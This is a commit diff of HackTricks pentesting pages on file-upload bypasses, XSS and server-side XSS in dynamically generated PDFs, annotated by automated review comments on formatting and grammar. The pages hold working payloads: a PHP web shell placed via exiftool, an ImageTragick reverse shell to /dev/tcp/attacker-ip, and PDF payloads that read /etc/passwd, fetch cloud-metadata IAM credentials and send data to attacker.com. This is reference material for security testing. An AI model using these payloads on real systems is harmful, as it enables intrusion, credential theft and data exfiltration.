GitBook: [#3154] No subject
This commit is contained in:
parent
5a4f9d6a67
commit
d95209236f
|
@ -1,4 +1,4 @@
|
|||
|
||||
# File Upload
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,25 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## File Upload
|
||||
|
||||
# File Upload
|
||||
|
||||
{% hint style="warning" %}
|
||||
**Support HackTricks and get benefits!**
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
|
||||
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
{% endhint %}
|
||||
|
||||
## File Upload General Methodology
|
||||
### File Upload General Methodology
|
||||
|
||||
Other useful extensions:
|
||||
|
||||
|
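Review bot: the heading levels in this hunk look inconsistent: `## File Upload` sits next to `# File Upload` even though the file already opens with `# File Upload` (first hunk), while `## File Upload General Methodology` is paired with `### File Upload General Methodology`, so the section is promoted to H1 but its subsections are demoted one level. Confirm the rendered page does not end up with two H1 titles, and, if the `{% hint %}` support block is being dropped here, that this is intended given the same block is kept in the `<details>` at the end of the file.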
@ -46,7 +30,7 @@ Other useful extensions:
|
|||
* **Perl**: _.pl, .cgi_
|
||||
* **Erlang Yaws Web Server**: _.yaws_
|
||||
|
||||
### Bypass file extensions checks
|
||||
#### Bypass file extensions checks
|
||||
|
||||
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
|
||||
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
|
||||
|
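Review bot: same heading-demotion pattern (`### Bypass file extensions checks` next to `#### Bypass file extensions checks`); in item 1, `If they apply, the **check** the **previous extensions.**` is missing a verb, suggest `If they apply, check the previous extensions` with the bold on the extension list only.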
@ -73,7 +57,7 @@ Other useful extensions:
|
|||
5. Add **another layer of extensions** to the previous check:
|
||||
* _file.png.jpg.php_
|
||||
* _file.php%00.png%00.jpg_
|
||||
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
|
||||
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code):
|
||||
* _ex: file.php.png_
|
||||
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
|
||||
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
|
||||
|
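Review bot: item 6 still has broken emphasis in both copies: `extension\*\* _**.php**_**, but** not necessarily ending in .php\*\*` leaves stray `\*\*` and unbalanced `**` markers that render literally. Suggest plain wording such as `anything whose name contains **.php** (not necessarily ending in .php) will execute code`. In item 8, `AAA<--SNIP-->AAA.php` would be clearer in backticks so the angle brackets are not read as markup.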
@ -89,14 +73,14 @@ Other useful extensions:
|
|||
AAA<--SNIP 232 A-->AAA.php.png
|
||||
```
|
||||
|
||||
### Bypass Content-Type & magic number
|
||||
#### Bypass Content-Type & magic number
|
||||
|
||||
1. Bypass Content-Type checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
|
||||
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
|
||||
2. Bypass magic number check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**: `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`
|
||||
1. It is also possible that the **magic bytes** are just being **checked** in the file and you could set them **anywhere in the file**.
|
||||
|
||||
### Other Tricks to check
|
||||
#### Other Tricks to check
|
||||
|
||||
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
||||
* Find a **Local File Inclusion** vulnerability to execute the backdoor.
|
||||
|
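Review bot: the sub-items `1. Content-Type **wordlist**` and `1. It is also possible that the **magic bytes** ...` appear at the same indentation as the parent items 1 and 2, so as shown they render as restarted lists rather than nested ones; indent them under their parents (this may be indentation lost in the diff view, but worth checking in the rendered page).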
@ -109,7 +93,7 @@ Other useful extensions:
|
|||
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
|
||||
* Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
|
||||
|
||||
### Special extension tricks
|
||||
#### Special extension tricks
|
||||
|
||||
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
|
||||
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
|
||||
|
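Review bot: the two links are inconsistent: the PHP `.htaccess` link is an absolute `https://book.hacktricks.xyz/...` URL while the ASP `.config` link is a relative `../../pentesting/...md#...` path. Relative paths survive GitBook moves and forks; mirroring the sibling link, this would be `../../pentesting/pentesting-web/php-tricks-esp.md#code-execution-via-httaccess` (anchor as given on the page). Also `when accidentally opened by victim` should be `by the victim`.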
@ -118,7 +102,7 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
|
|||
|
||||
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
|
||||
|
||||
### **wget File Upload/SSRF Trick**
|
||||
#### **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
|
||||
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
|
||||
|
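Review bot: grammar in the `.inc` and wget paragraphs: `someone could have allow **this extension to be executed**` should be `allowed`, and `**wget** truncate the filenames` should be `truncates`. The arithmetic checks out (232 `A` plus `.php` is 236), but say explicitly that the trailing `.gif` is what gets cut so the reader sees why the saved name ends in `.php`.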
@ -148,13 +132,13 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
|
|||
|
||||
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
|
||||
|
||||
### Other resources
|
||||
#### Other resources
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
|
||||
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
||||
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
||||
|
||||
## From File upload to other vulnerabilities
|
||||
### From File upload to other vulnerabilities
|
||||
|
||||
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
||||
* Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
|
||||
|
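Review bot: `the initial URL will bypass the check by then wget will download` should read `but then wget will download`. The `--trust-server-names` caveat is consistent with the behaviour described (without it wget keeps the name from the original URL), so keep it.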
@ -164,11 +148,12 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
|||
* **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
|
||||
* [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
|
||||
* [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
|
||||
* Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
|
||||
* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
|
||||
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
|
||||
* Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
|
||||
* Upload the \[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus**
|
||||
* Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
|
||||
* Check if there is any **size limit** uploading files
|
||||
|
||||
Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
|
||||
|
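Review bot: the eicar item appears twice with two escapings, and both `\[eicar]\(...)` forms render the brackets literally instead of as a link; use `Upload the [eicar](https://secure.eicar.org/eicar.com.txt) content to check if the server has any **antivirus**` and keep only one copy. Also `The following page present how` should be `presents how`.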
@ -184,22 +169,22 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
|
|||
9. **ZIP**: RCE via LFI / DoS
|
||||
10. **PDF / PPTX**: SSRF / BLIND XXE
|
||||
|
||||
### Burp Extension
|
||||
#### Burp Extension
|
||||
|
||||
{% embed url="https://github.com/portswigger/upload-scanner" %}
|
||||
|
||||
## Magic Header Bytes
|
||||
### Magic Header Bytes
|
||||
|
||||
* **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
|
||||
* **JPG**: `"\xff\xd8\xff"`
|
||||
|
||||
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
||||
|
||||
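Review bot: the PNG entry is wrong: `\xs0` is not a valid hex escape, and the bytes after `IHDR` (`\0\0\x03H\0\xs0\x03[`) are the width/height of one particular image, not part of the signature. The portable signature is the first 8 bytes `\x89PNG\r\n\x1a\n`, optionally followed by the IHDR chunk header `\0\0\0\rIHDR`; trim the entry to that. The JPG entry `\xff\xd8\xff` is fine.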
## Zip/Tar File Automatically decompressed Upload
|
||||
### Zip/Tar File Automatically decompressed Upload
|
||||
|
||||
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
||||
|
||||
### Symlink
|
||||
#### Symlink
|
||||
|
||||
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
|
||||
|
||||
|
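Review bot: `Upload a link containing soft links to other files` should be `Upload an archive containing soft links to other files`, since the commands that follow build a zip/tar whose member (`symindex.txt`) is the symlink.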
@ -209,7 +194,7 @@ zip --symlinks test.zip symindex.txt
|
|||
tar -cvf test.tar symindex.txt
|
||||
```
|
||||
|
||||
### Decompress in different folders
|
||||
#### Decompress in different folders
|
||||
|
||||
The decompressed files will be created in unexpected folders.
|
||||
|
||||
|
@ -292,7 +277,7 @@ Only one step remained: Upload the ZIP file and let the application decompress i
|
|||
|
||||
**Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
|
||||
|
||||
## ImageTragic
|
||||
### ImageTragic
|
||||
|
||||
Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)**
|
||||
|
||||
|
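Review bot: `(ImageMagick , 7.0.1-1)` has a stray comma and does not say whether 7.0.1-1 is the affected or the fixed version; write it out, for example `ImageMagick versions before 7.0.1-1`, if that is what is meant.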
@ -303,13 +288,13 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
|
|||
pop graphic-context
|
||||
```
|
||||
|
||||
## Embedding PHP Shell on PNG
|
||||
### Embedding PHP Shell on PNG
|
||||
|
||||
The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this [imagecopyresized](http://php.net/manual/en/function.imagecopyresized.php) and [imagecopyresampled](http://php.net/manual/en/function.imagecopyresampled.php).
|
||||
|
||||
Read this post: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
||||
|
||||
## Polyglot Files
|
||||
### Polyglot Files
|
||||
|
||||
Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
|
||||
|
||||
|
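Review bot: `The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations` reads better as `The primary reason for putting a web shell in the IDAT chunk is that it survives resize and re-sampling operations`; the two PHP-GD function links are the right references and can stay as they are.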
@ -319,7 +304,6 @@ This helps to upload a file that complins with the format of several different f
|
|||
|
||||
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -335,5 +319,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
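Review bot: the context line `This helps to upload a file that complins with the format of several different f...` has a typo, `complins` should be `complies`.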
@ -1070,6 +1070,21 @@ alert("XSS");
|
|||
</svg>
|
||||
```
|
||||
|
||||
```svg
|
||||
<svg width="500" height="500"
|
||||
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<circle cx="50" cy="50" r="45" fill="green"
|
||||
id="foo"/>
|
||||
|
||||
<foreignObject width="500" height="500">
|
||||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width="400" height="250"/>
|
||||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
|
||||
</foreignObject>
|
||||
</svg>ht
|
||||
```
|
||||
|
||||
Find m**ore SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
|
||||
### XSS resources
|
||||
|
||||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
|
||||
|
|
|
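Review bot: the second SVG block is malformed: the closing `</svg>ht` has a stray `ht` after the tag, and the first `<iframe>` uses double quotes inside a double-quoted `src` attribute (`background="red"` inside `src="data:text/html,..."`), which ends the attribute early and makes the XML invalid. Use single quotes around the inner value (`style.background='red'`) and drop the `ht`. Also `Find m**ore SVG payloads in**` has the bold marker in the middle of a word, and the trailing `****` after the link renders as an empty bold.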
@ -1,4 +1,4 @@
|
|||
|
||||
# Server Side XSS (Dynamic PDF)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,20 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# Server Side XSS (Dynamic PDF)
|
||||
|
||||
## Server Side XSS (Dynamic PDF)
|
||||
|
||||
### Server Side XSS (Dynamic PDF)
|
||||
|
||||
If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
|
||||
So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
|
||||
|
||||
Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
||||
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
||||
|
||||
## Payloads
|
||||
### Payloads
|
||||
|
||||
### Discovery
|
||||
#### Discovery
|
||||
|
||||
```markup
|
||||
<!-- Basic discovery, Write somthing-->
|
||||
|
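Review bot: the same title now appears three times in a row (`# Server Side XSS (Dynamic PDF)`, `## ...`, `### ...`) right after `</details>`, on top of the `#` title at the top of the file; keep one. Two small text fixes: `<script><\script>` should be `<script></script>`, and `Write somthing` in the discovery comment should be `something`.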
@ -44,7 +43,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
|||
<link rel=attachment href="http://attacker.com">
|
||||
```
|
||||
|
||||
### SVG
|
||||
#### SVG
|
||||
|
||||
Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
|
||||
|
||||
|
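Review bot: `Any of the previous of following payloads` should be `previous or following`, and `Burpcollab subdomain` would be clearer as `Burp Collaborator subdomain`.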
@ -59,9 +58,23 @@ Any of the previous of following payloads may be used inside this SVG payload. O
|
|||
</foreignObject>
|
||||
</g>
|
||||
</svg>
|
||||
|
||||
|
||||
<svg width="100%" height="100%" viewBox="0 0 100 100"
|
||||
xmlns="http://www.w3.org/2000/svg">
|
||||
<circle cx="50" cy="50" r="45" fill="green"
|
||||
id="foo"/>
|
||||
<script type="text/javascript">
|
||||
// <![CDATA[
|
||||
alert(1);
|
||||
// ]]>
|
||||
</script>
|
||||
</svg>
|
||||
```
|
||||
|
||||
### Path disclosure
|
||||
You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
|
||||
#### Path disclosure
|
||||
|
||||
```markup
|
||||
<!-- If the bot is accessing a file:// path, you will discover the internal path
|
||||
|
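Review bot: ordering and fencing problems: the sentence `You can find a lot **other SVG payloads** in ...` has landed between `### Path disclosure` and `#### Path disclosure`, and the new `<svg width="100%" ... viewBox=...>` document follows the first `</svg>` inside the same code fence with nothing separating them. Move the cheat-sheet sentence to the end of the SVG section (before the Path disclosure heading), keep only one Path disclosure heading, and put the second SVG in its own fence. Also `a lot other` should be `a lot of other`, and the trailing `****` after the link renders as an empty bold.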
@ -70,7 +83,7 @@ if not, you will at least have wich path the bot is accessing -->
|
|||
<script> document.write(window.location) </script>
|
||||
```
|
||||
|
||||
### Load an external script
|
||||
#### Load an external script
|
||||
|
||||
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
|
||||
|
||||
|
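Review bot: `The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script` is circular and `conformable` is not the intended word; suggest `The most convenient way to exploit this is to make the bot load a script you control`. The context line `wich path the bot is accessing` should be `which path`.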
@ -79,7 +92,7 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
|||
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
||||
```
|
||||
|
||||
### Read local file
|
||||
#### Read local file
|
||||
|
||||
```markup
|
||||
<script>
|
||||
|
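Review bot: the `onerror` handler nests double quotes inside a double-quoted attribute (`onerror="document.write('<script src="https://...`), so the attribute value ends at `src=` and the handler never runs as written; use escaped single quotes for the inner attribute (`src=\'https://attacker.com/test.js\'`) or swap the outer quotes.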
@ -107,13 +120,13 @@ x.open("GET","file:///etc/passwd");x.send();
|
|||
<portal src="file:///etc/passwd" id=portal>
|
||||
```
|
||||
|
||||
### Get external web page response as attachment (metadata endpoints)
|
||||
#### Get external web page response as attachment (metadata endpoints)
|
||||
|
||||
```markup
|
||||
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
||||
```
|
||||
|
||||
### Bot delay
|
||||
#### Bot delay
|
||||
|
||||
```markup
|
||||
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
|
||||
|
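Review bot: the metadata link has a doubled scheme: `href="http://http://169.254.169.254/latest/meta-data/...` should be `href="http://169.254.169.254/latest/meta-data/...`.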
@ -128,7 +141,7 @@ x.open("GET","file:///etc/passwd");x.send();
|
|||
<img src="https://attacker.com/delay">
|
||||
```
|
||||
|
||||
### Port Scan
|
||||
#### Port Scan
|
||||
|
||||
```markup
|
||||
<!--Scan local port and receive a ping indicating which ones are found-->
|
||||
|
@ -147,11 +160,11 @@ for(let i=0; i<1000; i++) {
|
|||
<img src="https://attacker.com/startingScan">
|
||||
```
|
||||
|
||||
### [SSRF](../ssrf-server-side-request-forgery/)
|
||||
#### [SSRF](../ssrf-server-side-request-forgery/)
|
||||
|
||||
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
|
||||
|
||||
|
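Review bot: `This vulnerability can be transformed very easily in a SSRF` should be `turned very easily into an SSRF`, and `(read some metadata?)` is vague; point to the metadata-endpoint attachment payload in the section above instead.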
@ -159,8 +172,6 @@ This vulnerability can be transformed very easily in a SSRF (as you can make the
|
|||
|
||||
{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -176,5 +187,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|